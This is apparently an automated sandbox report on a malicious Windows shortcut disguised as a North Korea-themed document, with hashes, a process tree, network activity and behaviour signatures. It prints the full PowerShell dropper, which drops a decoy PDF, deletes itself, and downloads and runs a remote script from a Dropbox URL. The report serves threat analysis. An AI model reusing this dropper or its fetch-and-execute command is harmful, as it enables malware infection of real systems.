Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/03/2024, 16:22 UTC

General

  • Target

    34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk

  • Size

    1.7MB

  • MD5

    21e6ec6dd1e6d3b7abfda04e9189d72d

  • SHA1

    11db057a906824897c8fabcc42f0ba7f88e04f81

  • SHA256

    34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2

  • SHA512

    a741dc0b33a8ab2860f4279563b2baf29ab74e9f0d7a033fc39ffe3d0969d5e3cc8ec77b1e9ff4051a0ec83f267ff6ab2980bbafb90f3d7e4f5663ae4aac4190

  • SSDEEP

    24576:b74C5wFv9TW5mFiS3h+nP8etAercYKyLgLgybuEDcqbzZBqnATq9HlMhwLo:QC6LBFiS301AYwsySED9bzyFghwM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
    $dirpath = get-location
    if ($dirpath -match "System32" -or $dirpath -match "Program Files" -or $dirpath -eq "") {
        $dirpath = $env:temp
    }
    $files = get-childitem -path $dirpath -recurse -filter "General view of North Korea 240226.lnk"
    $lnkfilepath = ""
    foreach ($file in $files) {
        $lnkfilepath = $file.fullname
    }
    $startaddress = 0
    $filebytes = get-content -path $lnkfilepath -encoding byte -raw
    $a5 = 0x50
    $b4 = 0x4b
    $c3 = 0x03
    $d4 = 0x04
    for ($i = 0; $i -lt $filebytes.length; $i++) {
        if ($filebytes[$i] -eq $a5) {
            if ($filebytes[$i + 1] -eq $b4) {
                if ($filebytes[$i + 2] -eq $c3) {
                    if ($filebytes[$i + 3] -eq $d4) {
URLs
ps1.dropper

https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\*rshell.exe /s /b /od') do call %a -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;" && cls &&exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\*rshell.exe /s /b /od
        3⤵
          PID:2516
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708

    Network

    • flag-us
      DNS
      dl.dropboxusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      dl.dropboxusercontent.com
      IN A
      Response
      dl.dropboxusercontent.com
      IN CNAME
      edge-block-www-env.dropbox-dns.com
      edge-block-www-env.dropbox-dns.com
      IN A
      162.125.64.15
    • 162.125.64.15:443
      dl.dropboxusercontent.com
      tls
      powershell.exe
      359 B
      219 B
      5
      5
    • 162.125.64.15:443
      dl.dropboxusercontent.com
      tls
      powershell.exe
      359 B
      219 B
      5
      5
    • 8.8.8.8:53
      dl.dropboxusercontent.com
      dns
      powershell.exe
      71 B
      132 B
      1
      1

      DNS Request

      dl.dropboxusercontent.com

      DNS Response

      162.125.64.15

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/2708-38-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB

    • memory/2708-39-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB

    • memory/2708-40-0x0000000002310000-0x0000000002350000-memory.dmp

      Filesize

      256KB

    • memory/2708-41-0x0000000002310000-0x0000000002350000-memory.dmp

      Filesize

      256KB

    • memory/2708-42-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB